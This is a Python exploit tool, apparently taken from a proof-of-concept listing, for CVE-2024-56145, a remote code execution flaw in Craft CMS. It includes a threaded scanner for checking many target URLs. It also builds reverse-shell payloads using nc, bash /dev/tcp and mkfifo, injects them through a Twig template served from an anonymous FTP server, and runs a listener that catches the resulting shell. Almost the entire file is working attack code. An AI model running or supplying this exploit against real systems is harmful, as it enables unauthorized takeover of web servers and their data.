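# NOTE(review): the next six lines look like web-page residue rather than code;
# they are kept verbatim but commented out so the module can be parsed.
# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / exploit.py PY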
import os
import sys
import uuid
import select
import socket
import warnings
import requests
import threading
import rich_click as click

from rich.console import Console
from alive_progress import alive_bar
from pyftpdlib.servers import FTPServer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.authorizers import DummyAuthorizer
from concurrent.futures import ThreadPoolExecutor

# Shared Rich console used for every status message printed by this script.
console = Console()
# Silence urllib3 warnings; the HTTP requests in this file are sent with
# verify=False.
requests.packages.urllib3.disable_warnings()
# Ignore RuntimeWarning raised from the pyftpdlib.authorizers module.
warnings.filterwarnings(
    "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)


# Root command group. click uses a command's docstring as its help text, so
# the docstring below is runtime output and is kept verbatim.
@click.group(context_settings={"help_option_names": ["-h", "--help"]})
def cli():
    """
    CVE-2024-56145 Exploit Framework

    Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
    Thanks to Assetnote for their research and findings:
    https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

    This tool provides commands to:
    - Check if a target is vulnerable.
    - Exploit the vulnerability using a crafted FTP server and listener.
    """


@cli.command()
@click.option("-u", "--url", required=False, help="The target URL for checking")
@click.option(
    "-f",
    "--file",
    required=False,
    type=click.Path(exists=True),
    help="File containing a list of URLs",
)
@click.option(
    "-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
    "-o",
    "--output",
    required=False,
    type=click.Path(),
    help="Output file to save results",
)
def check(url, file, threads, output):
    # Documented with comments rather than a docstring so that the command's
    # `--help` output stays exactly as it was.
    #
    # Runs check_target() over the single --url and/or every non-blank line
    # of --file using a pool of `threads` workers. When --output is given,
    # one result line per target is appended to that file.
    if not (url or file):
        console.print(
            "[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
        )
        return

    targets = [url] if url else []
    if file:
        # Context manager so the list file is closed once it has been read.
        with open(file, "r") as url_file:
            targets.extend(line.strip() for line in url_file if line.strip())

    lock = threading.Lock()
    # Results are optional: without --output there is simply nothing to write.
    out_file = open(output, "a") if output else None
    try:
        with alive_bar(
            len(targets), title="Checking Targets", bar="smooth", enrich_print=False
        ) as bar:

            def process_target(target):
                result = check_target(target)
                # One lock guards both the shared file and the progress bar;
                # the bar is advanced only after the target has been checked.
                with lock:
                    if out_file is not None:
                        out_file.write(f"{result}\n")
                    bar()

            with ThreadPoolExecutor(max_workers=threads) as executor:
                # Consume the iterator: Executor.map only re-raises a worker's
                # exception when its result is retrieved, so leaving it
                # unconsumed would silently discard failures.
                for _ in executor.map(process_target, targets):
                    pass
    finally:
        if out_file is not None:
            out_file.close()


def check_target(target):
    """Probe one URL and return a ``"<target> | <VERDICT>"`` result line.

    A GET request is sent with a ``--configPath=/<random uuid>`` query
    string. The target is reported as vulnerable when the response body
    contains both ``mkdir()`` and the random value; any exception raised
    along the way yields an ``ERROR`` verdict. The outcome is also printed
    to the console.
    """
    token = str(uuid.uuid4())
    try:
        probe_url = f"{target}?--configPath=/{token}"
        reply = requests.get(probe_url, verify=False, timeout=2)
        if not ("mkdir()" in reply.text and token in reply.text):
            console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
            return f"{target} | NOT VULNERABLE"
        console.print(f"[bold green]{target} is vulnerable![/bold green]")
        return f"{target} | VULNERABLE"
    except Exception as e:
        console.print(f"[bold red]Failed to check {target}: {e}[/bold red]")
        return f"{target} | ERROR"


@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=True, help="The target URL for exploitation")
@click.option(
    "-lh", "--lhost", required=True, help="The local host for reverse shell listener"
)
@click.option(
    "-lp",
    "--lport",
    required=True,
    type=int,
    help="The local port for reverse shell listener",
)
@click.option(
    "-px",
    "--payload",
    default="bash",
    type=click.Choice(["nc", "bash", "mkfifo"]),
    help="Payload type to use",
)
def exploit(ftp_host, ftp_port, url, lhost, lport, payload):
    # Documented with comments rather than a docstring so that the command's
    # `--help` output stays exactly as it was.
    #
    # Steps: write the generated payload into ./virtual, start the FTP server
    # and the listener on daemon threads, then send the HTTP request from the
    # calling thread.
    root_dir = "./virtual"
    create_virtual_files(root_dir, generate_payload(payload, lhost, lport))

    ftp_thread = threading.Thread(
        target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=True
    )
    ftp_thread.start()

    listener_thread = threading.Thread(
        target=start_listener, args=(lhost, lport), daemon=True
    )
    listener_thread.start()

    console.print("[bold green]FTP server and listener started[/bold green]")
    trigger_http_request(url, ftp_host, ftp_port)


def generate_payload(payload_type, lhost, lport):
    """Build the template string for the selected payload type.

    ``payload_type`` must be one of ``"nc"``, ``"bash"`` or ``"mkfifo"``;
    any other value raises ``KeyError``. The generated string is printed to
    the console and returned.
    """
    commands = {
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
        "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
    }
    command = commands[payload_type]

    # The quadrupled braces render as literal "{{" and "}}" in the output.
    payload = f"{{{{ ['system', '{command}'] | sort('call_user_func') }}}}"
    console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
    return payload


def create_virtual_files(root_dir, payload):
    """Write ``payload`` to ``index.twig`` and ``index.html`` in ``<root_dir>/default``.

    The directory is created if it does not exist. Any exception is caught
    and reported on the console; the function returns ``None`` either way.
    """
    try:
        template_dir = f"{root_dir}/default"
        os.makedirs(template_dir, exist_ok=True)
        # Both files receive exactly the same content.
        for filename in ("index.twig", "index.html"):
            with open(f"{template_dir}/{filename}", "w") as handle:
                handle.write(payload)
        console.print("[bold green]Virtual files created successfully.[/bold green]")
    except Exception as e:
        console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}")


def start_ftp_server(host, port, root_dir):
    """Serve ``root_dir`` over anonymous FTP on ``host:port`` until stopped.

    Blocks in ``serve_forever()``, so callers run it on its own thread.
    Failures while setting up the authorizer, creating the server or
    serving are reported on the console instead of being raised.
    """
    try:
        # Setup and construction are inside the try block so that start-up
        # failures reach the "Error starting FTP server" message below
        # rather than escaping as an unhandled exception in the thread.
        authorizer = DummyAuthorizer()
        authorizer.add_anonymous(root_dir, perm="elradfmw")
        # Note: the authorizer is assigned on the FTPHandler class itself,
        # not on an instance.
        handler = FTPHandler
        handler.authorizer = authorizer
        server = FTPServer((host, port), handler)
        console.print(f"[bold green]FTP server running on {host}:{port}[/bold green]")
        server.serve_forever()
    except Exception as e:
        console.print(f"[bold red]Error starting FTP server:[/bold red] {e}")


def trigger_http_request(url, ftp_host, ftp_port):
    """Send the GET request that points ``--templatesPath`` at the FTP server.

    The request is made without a timeout, so the call blocks until the
    target responds. A 200 status is reported as success, any other status
    as failure, and any exception is reported on the console instead of
    being raised.
    """
    templates_path = f"ftp://{ftp_host}:{ftp_port}"
    console.print(
        f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[/bold yellow]"
    )
    try:
        response = requests.get(f"{url}?--templatesPath={templates_path}", verify=False)
    except Exception as e:
        console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}")
        return

    if response.status_code == 200:
        console.print(
            "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
        )
    else:
        console.print(
            f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
        )


def start_listener(lhost, lport, timeout=30):
    """Accept one TCP connection on ``lhost:lport`` and relay it to the terminal.

    Waits up to ``timeout`` seconds for a connection. Once connected, data
    received from the peer is written to stdout and each line read from
    stdin is sent to the peer, until the peer closes the connection.
    Errors are reported on the console, and both sockets are always closed
    before returning.
    """
    console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[/bold cyan]")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Pre-bind the name so the finally block is safe when accept() times out
    # or fails before a connection exists.
    conn = None
    try:
        # bind/listen are inside the try block so the listening socket is
        # closed, and the error reported, if the address cannot be bound.
        s.bind((lhost, lport))
        s.listen(1)
        s.settimeout(timeout)
        console.print(
            f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
        )
        conn, addr = s.accept()
        console.print(
            f"[bold green]Connection received from {addr[0]}:{addr[1]}[/bold green]"
        )
        conn.setblocking(0)
        while True:
            # Block until either the peer or the local stdin has data.
            ready, _, _ = select.select([conn, sys.stdin], [], [])
            if conn in ready:
                data = conn.recv(4096).decode(errors="ignore")
                if not data:
                    # An empty read means the peer closed the connection.
                    break
                sys.stdout.write(data)
                sys.stdout.flush()
            if sys.stdin in ready:
                command = sys.stdin.readline().strip()
                conn.sendall((command + "\n").encode())
    except socket.timeout:
        console.print(
            f"[bold red]No connection received within {timeout} seconds.[/bold red]"
        )
    except KeyboardInterrupt:
        console.print("[bold cyan]\nListener stopped by user.[/bold cyan]")
    except Exception as e:
        console.print(f"[bold red]Error: {e}[/bold red]")
    finally:
        if conn is not None:
            conn.close()
        s.close()
        console.print("[bold cyan]Listener closed.[/bold cyan]")


# Run the click command group when this file is executed as a script.
if __name__ == "__main__":
    cli()